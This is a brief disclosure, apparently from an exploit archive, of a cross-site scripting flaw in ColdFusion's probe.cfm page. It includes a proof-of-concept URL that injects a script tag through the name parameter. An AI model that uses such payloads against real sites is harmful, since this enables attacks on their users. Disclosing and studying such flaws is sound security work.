ColdFusion suffers from a cross site scripting vulnerability in probe.cfm.
614864fce2758c58847e6cee347db6486646f9a32bbeb09bdd13ab33ee47032c
*Describe£º*ColdFusion probe.cfm page local parameter can xss
*CVE£º*Unknow
*PoC£º*
http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
URL.Name parameter can xss only local.
Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html